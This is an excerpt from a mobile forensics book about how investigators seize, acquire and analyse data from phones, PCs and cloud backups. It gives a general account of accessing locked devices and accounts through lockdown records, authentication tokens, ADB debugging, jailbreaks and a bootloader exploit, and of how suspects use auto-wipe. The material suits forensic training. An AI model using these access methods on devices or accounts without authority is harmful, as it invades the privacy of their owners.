In this article by Oleg Afonin and Vladimir Katalov, the authors of the book Mobile Forensics – Advanced Investigative Strategies, we will see that today's smartphones are used less for calling and more for socializing, this has resulted in the smartphones holding a lot of sensitive data about their users. Mobile devices keep the user's contacts from a variety of sources (including the phone, social networks, instant messaging, and communication applications), information about phone calls, sent and received text messages, and e-mails and attachments. There are also browser logs and cached geolocation information; pictures and videos taken with the phone's camera; passwords to cloud services, forums, social networks, online portals, and shopping websites; stored payment data; and a lot of other information that can be vital for an investigation. (For more resources related to this topic, see here.) Needless to say, this information is very important for corporate and forensic investigations. In this book, we'll discuss not only how to gain access to all this data, but also what type of data may be available in each particular case. Tablets are no longer used solely as entertainment devices. Equipped with powerful processors and plenty of storage, even the smallest tablets are capable of running full Windows, complete with the Office suite. While not as popular as smartphones, tablets are still widely used to socialize, communicate, plan events, and book trips. Some smartphones are equipped with screens as large as 6.4 inches, while many tablets come with the ability to make voice calls over cellular network. All this makes it difficult to draw a line between a phone (or phablet) and a tablet. Every smartphone on the market has a camera that, unlike a bigger (and possibly better) camera, is always accessible. As a result, an average smartphone contains more photos and videos than a dedicated camera; sometimes, it's gigabytes worth of images and video clips. Smartphones are also storage devices. They can be used (and are used) to keep, carry, and exchange information. Smartphones connected to a corporate network may have access to files and documents not meant to be exposed. Uncontrolled access to corporate networks from employees' smartphones can (and does) cause leaks of highly-sensitive information. Employees come and go. With many companies allowing or even encouraging bring your own device policies, controlling the data that is accessible to those connecting to a corporate network is essential. What You Get Depends on What You Have Unlike personal computers that basically present a single source of information (the device itself consisting of hard drive(s) and volatile memory), mobile forensics deals with multiple data sources. Depending on the sources that are available, investigators may use one or the other tool to acquire information. The mobile device If you have access to the mobile device, you can attempt to perform physical or logical acquisition. Depending on the device itself (hardware) and the operating system it is running, this may or may not be possible. However, physical acquisition still counts as the most complete and up-to-date source of evidence among all available. Generally speaking, physical acquisition is available for most Android smartphones and tablets, older Apple hardware (iPhones up to iPhone 4, the original iPad, iPad mini, and so on), and recent Apple hardware with known passcode. As a rule, Apple devices can only be physically acquired if jailbroken. Since a jailbreak obtains superuser privileges by exploiting a vulnerability in iOS, and Apple actively fixes such vulnerabilities, physical acquisition of iOS devices remains iffy. A physical acquisition technique has been recently developed for some Windows phone devices using Cellebrite Universal Forensic Extraction Device (UFED). Physical acquisition is also available for 64-bit Apple hardware (iPhone 5S and newer, iPad mini 2, and so on). It is worth noting that physical acquisition of 64-bit devices is even more restrictive compared to the older 32-bit hardware, as it requires not only jailbreaking the device and unlocking it with a passcode, but also removing the said passcode from the security settings. Interestingly, according to Apple, even Apple itself cannot extract information from 64-bit iOS devices running iOS 8 and newer, even if they are served a court order. Physical acquisition is available on a limited number of BlackBerry smartphones running BlackBerry OS 7 and earlier. For BlackBerry smartphones, physical acquisition is available for unlocked BlackBerry 7 and lower devices, where supported, using Cellebrite UFED Touch/4PC through the bootloader method. For BlackBerry 10 devices where device encryption is not enabled, a chip-off can successfully acquire the device memory by parsing the physical dump using Cellebrite UFED. Personal computer Notably, the user's personal computer can help acquiring mobile evidence. The PC may contain the phone's offline data backups (such as those produced by Apple iTunes) that contain most of the information stored in the phone and available (or unavailable) during physical acquisition. Lockdown records are created when an iOS device is physically connected to the computer and authorized through iTunes. Lockdown records may be used to gain access to an iOS device without entering the passcode. In addition, the computer may contain binary authentication tokens that can be used to access respective cloud accounts linked to user's mobile devices. Access to cloud storage Many smartphones and tablets, especially those produced by Apple, offer the ability to back up information into an online cloud. Apple smartphones, for example, will automatically back up their content to Apple iCloud every time they are connected to a charger within the reach of a known Wi-Fi network. Windows phone devices exhibit similar behavior. Google, while not featuring full cloud backups like Apple or Microsoft, collects and retains even more information through Google Mobile Services (GMS). This information can also be pulled from the cloud. Since cloud backups are transparent, non-intrusive and require no user interaction, they are left enabled by default by many smartphone users, which makes it possible for an investigator to either acquire the content of the cloud storage or request it from the respective company with a court order. In order to successfully access the phone's cloud storage, one needs to know the user's authentication credentials (login and password). It may be possible to access iCloud by using binary authentication tokens extracted from the user's computer. With manufacturers quickly advancing in their security implementations, cloud forensics is quickly gaining importance and recognition among digital forensic specialists. Stages of mobile forensics This section will briefly discuss the general stages of mobile forensics and is not intended to provide a detailed explanation of each stage. There is more-than-sufficient documentation that can be easily accessed on the Internet that provides an intimate level of detail regarding the stages of mobile forensics. The most important concept for the reader to understand is this: have the least level of impact on the mobile device during all the stages. In other words, an examiner should first work on the continuum of the least-intrusive method to the most-intrusive method, which can be dictated by the type of data needing to be obtained from the mobile device and complexity of the hardware/software of the mobile device. Stage one – device seizure This stage pertains to the physical seizure of the device so that it comes under the control and custody of the investigator/examiner. Consideration must also be given to the legal authority or written consent to seize, extract, and search this data. The physical condition of the device at the time of seizure should be noted, ideally through digital photographic documentation and written notes, such as: Is the device damaged? If, yes, then document the type of damage. Is the device on or off? What is the device date and time if the device is on? If the device is on, what apps are running or observable on the device desktop? If the device is on, is the device desktop accessible to check for passcode and security settings? Several other aspects of device seizure are described in the following as they will affect post-seizure analysis: radio isolation, turning the device off if it is on, remote wipe, and anti-forensics. Seizing – what and how to seize? When it comes to properly acquiring a mobile device, one must be aware of the many differences in how computers and mobile devices operate. Seizing, handling, storing, and extracting mobile devices must follow a different route compared to desktop and even laptop computers. Unlike PCs that can be either online or offline (which includes energy-saving states of sleep and hibernation), smartphones and tablets use a different, always-connected modus of operandi. Tremendous amounts of activities are carried out in the background, even while the device is apparently sleeping. Activities can be scheduled or triggered by a large number of events, including push events from online services and events that are initiated remotely by the user. Another thing to consider when acquiring a mobile device is security. Mobile devices are carried around a lot, and they are designed to be inherently more secure than desktop PCs. Non-removable storage and soldered RAM chips, optional or enforced data encryption, remote kill switches, secure lock screens, and locked bootloaders are just a few security measures to be mentioned. The use of Faraday bags Faraday bags are commonly used to temporarily store seized devices without powering them down. A Faraday bag blocks wireless connectivity to cellular networks, Wi-Fi, Bluetooth, satellite navigation, and any other radios used in mobile devices. Faraday bags are normally designed to shield the range of radio frequencies used by local cellular carriers and satellite navigation (typically the 700-2,600 MHz), as well as the 2.4-5 GHz range used by Wi-Fi networks and Bluetooth. Many Faraday bags are made of specially-coated metallic shielding material that blocks a wide range of radio frequencies. Keeping the power on When dealing with a seized device, it is essential to prevent the device from powering off. Never switching off a working device is one thing, preventing it from powering down is another. Since mobile devices consume power even while the display is off, the standard practice is connecting the device to a charger and placing it into a wireless-blocking Faraday bag. This will prevent the mobile device from shutting down after reaching the low-power state. Why exactly do we need this procedure? The thing is, you may be able to extract more information from a device that was used (unlocked at least once) after the last boot cycle compared to a device that boots up in your lab and you don't know the passcode. To illustrate the potential outcome, let's say you seized an iPhone that is locked with an unknown passcode. The iPhone happens to be jailbroken, so you can attempt using Elcomsoft iOS Forensic Toolkit to extract information. If the device is locked and you don't know the passcode, you will have access to a very limited set of data: Recent geolocation information: Since the main location database remains encrypted, it is only possible to extract limited location data. This limited location data is only accessible if the device was unlocked at least once after the boot has completed. As a result, if you keep the device powered on, you may pull recent geolocation history from this device. If, however, the device shuts down and is only powered on in the lab, the geolocation data will remain inaccessible until the device is unlocked. Incoming calls (numbers only) and text messages: Incoming text messages are temporarily retained unencrypted before the first unlock after cold boot. Once the device is unlocked for the first time after cold boot, the messages will be transferred into the main encrypted database. This means that acquiring a device that was never unlocked after a cold start will only allow access to text messages received by the device during the time it remained locked after the boot. If the iPhone being acquired was unlocked at least once after it was booted (for example, if the device was seized in a turned-on state), you may be able to access significantly more information. The SMS database is decrypted on first unlock, allowing you pulling all text messages and not just those that were received while the device remained locked. App and system logs (installs and updates, net access logs, and so on). SQLite temp files, including write-ahead logs (WAL): These WAL may include messages received by applications such as Skype, Viber, Facebook Messenger, and so on. Once the device is unlocked, the data is merged with corresponding apps' main databases. When extracting a device after a cold boot (never unlocked), you will only have access to notifications received after the boot. If, however, you are extracting a device that was unlocked at least once after booting up, you may be able to extract the complete database with all messages (depending on the data protection class selected by the developer of a particular application). Dealing with the kill switch Mobile operating systems such as Apple iOS, recent versions of Google Android, all versions of BlackBerry OS, and Microsoft Windows phone 8/8.1 (Windows 10 mobile) have an important security feature designed to prevent unauthorized persons from accessing information stored in the device. The so-called kill switch enables the owner to lock or erase the device if the device is reported lost or stolen. While used by legitimate customers to safeguard their data, this feature is also used by suspects who may attempt to remotely destroy evidence if their mobile device is seized. In the recent Morristown man accused of remotely wiping nude photos of underage girlfriend on confiscated phone report (http://wate.com/2015/04/07/morristown-man-accused-of-remotely-wiping-nude-photos-of-underage-girlfriend-on-confiscated-phone/), the accused used the remote kill switch to wipe data stored on his iPhone. Using the Faraday bag is essential to prevent suspects from accessing the kill switch. However, even if the device in question has already been wiped remotely, it does not necessarily mean that all the data is completely lost. Apple iOS, Windows phone 8/8.1, Windows 10 mobile, and the latest version of Android (Android 6.0 Marshmallow) support cloud backups (albeit Android cloud backups contains limited amounts of data). When it comes to BlackBerry 10, the backups are strictly offline, yet the decryption key is tied to the user's BlackBerry ID and stored on BlackBerry servers. The ability to automatically upload backup copies of data into the cloud is a double-edged sword. While offering more convenience to the user, cloud backups make remote acquisition techniques possible. Depending on the platform, all or some information from the device can be retrieved from the cloud by either making use of a forensic tool (for example, Elcomsoft Phone Breaker, Oxygen Forensic Detective) or by serving a government request to the corresponding company (Apple, Google, Microsoft, or BlackBerry). Mobile device anti-forensics There are numerous anti-forensic methods that target evidence acquisition methods used by the law enforcement. It is common for the police to seize a device, connect it to a charger, and place into a Faraday bag. The anti-forensic method used by some technologically-advanced suspects on Android phones involves rooting the device and installing a tool that monitors wireless connectivity of the device. If the tool detects that the device has been idle, connected to a charger, and without wireless connectivity for a predefined period, it performs a factory reset. Since there is no practical way of determining whether such protection is active on the device prior to acquisition, simply following established guidelines presents a risk of evidence being destroyed. If there are reasonable grounds to suspect such a system may be in place, the device can be powered down (while realizing the risk of full-disk encryption preventing subsequent acquisition). While rooting or jailbreaking devices generally makes the device susceptible to advanced acquisition methods, we've seen users who unlocked their bootloader to install a custom recovery, protected access to this custom recovery with a password, and relocked the bootloader. Locked bootloader and password-protected access to custom recovery is an extremely tough combination to break. In several reports, we've become aware of the following anti-forensic technique used by a group of cyber criminals. The devices were configured to automatically wipe user data if certain predefined conditions were met. In this case, the predefined conditions triggering the wipe matched the typical acquisition scenario of placing the device inside a Faraday bag and connecting it to a charger. Once the device reported being charged without wireless connectivity (but not in airplane mode) for a certain amount of time, a special tool triggers a full factory reset of the device. Notably, this is only possible on rooted/jailbroken devices. So far, this anti-forensic technique did not receive a wide recognition. It's used by a small minority of smartphone users, mostly those into cybercrime. The low probability of a smartphone being configured that way is small enough to consider implementing changes to published guidelines. Stage two – data acquisition This stage refers to various methods of extracting data from the device. The methods of data extraction that can be employed are influenced by the following: Type of mobile device: The make, model, hardware, software, and vendor configuration. Availability of a diverse set of hardware and software extraction/analysis tools at the examiner's disposal: There is no tool that does it all, an examiner needs to have access to a number of tools that can assist with data extraction. Physical state of device: Has the device been exposed to damage, such as physical, water, biological fluids such as blood? Often the type of damage can dictate the types of data extraction measures that will be employed on the device. There are several different types of data extractions that determine how much data is obtained from the device: Physical: Binary image of the device has the most potential to recover deleted data and obtains the largest amount of data from the device. This can be the most challenging type of extraction to obtain. File system: This is a representation of the files and folders from the user area of the device, and can contain deleted data, specific to databases. This method will contain less data than a physical data extraction. Logical: This acquires the least amount of data from the device. Examples of this are call history, messages, contacts, pictures, movies, audio files, and so on. This is referred to as low-hanging fruit. No deleted data or source files are obtained. Often the resulting output will be a series of reports produced by the extraction tool. This is often the easiest and quickest type of extraction. Photographic documentation: This method is typically used when all other data extraction avenues are exhausted. In this procedure, the examiner uses a digital camera to photographically document the content being displayed by the device. This is a time-consuming method when there is an extensive amount of information to photograph. Specific data-extraction concepts are explained here: bootloader, jailbreak, rooting, adb, debug, and sim cloning. Root, jailbreak, and unlocked bootloader Rooting or jailbreaking the mobile devices in general makes them susceptible to a wide range of exploits. In the context of mobile forensics, rooted devices are easy to acquire since many forensic acquisition tools rely on root/jailbreak to perform physical acquisition. Devices with unlocked bootloaders allow booting unsigned code, effectively permitting full access to the device even if it's locked with a passcode. However, if the device is encrypted and the passcode is part of the encryption key, bypassing passcode protection may not automatically enable access to encrypted data. Rooting or jailbreaking enables unrestricted access to the filesystem, bypassing the operating system's security measures and allowing the acquisition tool to read information from protected areas. This is one of the reasons for banning rooted devices (as well as devices with unlocked bootloaders) from corporate premises. Installing a jailbreak on iOS devices always makes the phone less secure, enabling third-party code to be injected and run on a system level. This fact is well-known to forensic experts who make use of tools such as Cellebrite UFED or Elcomsoft iOS Forensic Toolkit to perform physical acquisition of jailbroken Apple smartphones. Some Android devices allow unlocking the bootloader, which enables easy and straightforward rooting of the device. While not all Android devices with unlocked bootloaders are rooted, installing root access during acquisition of a bootloader-unlocked device has a much higher chance of success compared to devices that are locked down. Tools such as Cellebrite UFED, Forensic Toolkit (FTK), Oxygen Forensic Suite, and many others can make use of the phone's root status in order to inject acquisition applets and image the device. Unlocked bootloaders can be exploited as well if you use UFED. A bootloader-level exploit exists and is used in UFED to perform acquisition of many Android and Windows phone devices based on the Qualcomm reference platform even if their bootloader is locked. Android ADB debugging Android has a hidden Developer Options menu. Accessing this menu requires a conscious effort of tapping on the OS build number multiple times. Some users enable Developer Options out of curiosity. Once enabled, the Developer Options menu may or may not be possible to hide. Among other things, the Developer Options menu lists an option called USB debugging or ADB debugging. If enabled, this option allows controlling the device via ADB command line, which in turn allows experts using Android debugging tools (adb.exe) to connect to the device from a PC even if it's locked with a passcode. Activated USB debugging exposes a lot of possibilities and can make acquisition possible even if the device is locked with a passcode. Memory card Most smartphone devices and tablets (except iOS devices) have the capability of increasing their storage capacity by using a microSD card. An examiner would remove the memory card from the mobile device/tablet and use either hardware or software write-protection methods, and create a bit stream forensic image of the memory card, which can then be analyzed using forensic software tools, such as X-Ways, Autopsy Sleuth Kit, Forensic Explorer (GetData), EnCase, or FTK (AccessData). Stage three – data analysis This stage of mobile device forensics entails analysis of the acquired data from the device and its components (SIM card and memory card if present). Most mobile forensic acquisition tools that acquire the data from the device memory can also parse the extracted data and provide the examiner functionality within the tool to perform analysis. This entails review of any non-deleted and deleted data. When reviewing non-deleted data, it would be prudent to also perform a manual review of the device to ensure that the extracted and parsed data matches what is displayed by the device. As mobile device storage capacities have increased, it is suggested that a limited subset of data records from the relevant areas be reviewed. So, for example, if a mobile device has over 200 call records, reviewing several call records from missed calls, incoming calls, and outgoing calls can be checked on the device in relation to the similar records in the extracted data. By doing this manual review, it is then possible to discover any discrepancies in the extracted data. Manual device review can only be completed when the device is still in the custody of the examiner. There are situations where, after the data extraction has been completed, the device is released back to the investigator or owner. In situations such as this, the examiner should document that very limited or no manual verification can be performed due to these circumstances. Finally, the reader should be keenly aware that more than one analysis tool can be used to analyze the acquired data. Multiple analysis tools should be considered, especially when a specific type of data cannot be parsed by one tool, but can be analyzed by another. Summary In this article, we've covered the basics of mobile forensics. We discussed the amount of evidence available in today's mobile devices and covered the general steps of mobile forensics. We also discussed how to seize, handle, and store mobile devices, and looked at how criminals can use technology to prevent forensic access. We provided a general overview of the acquisition and analysis steps. For more information on mobile forensics, you can refer to the following books by Packt: Practical Mobile Forensics - Second Edition: https://www.packtpub.com/networking-and-servers/practical-mobile-forensics-second-edition Mastering Mobile Forensics: https://www.packtpub.com/networking-and-servers/mastering-mobile-forensics Learning iOS Forensics: https://www.packtpub.com/networking-and-servers/learning-ios-forensics  Resources for Article: Further resources on this subject: Mobile Forensics [article] Mobile Forensics and Its Challanges [article] Introduction to Mobile Forensics [article]
Read more
  • 0
  • 0
  • 3989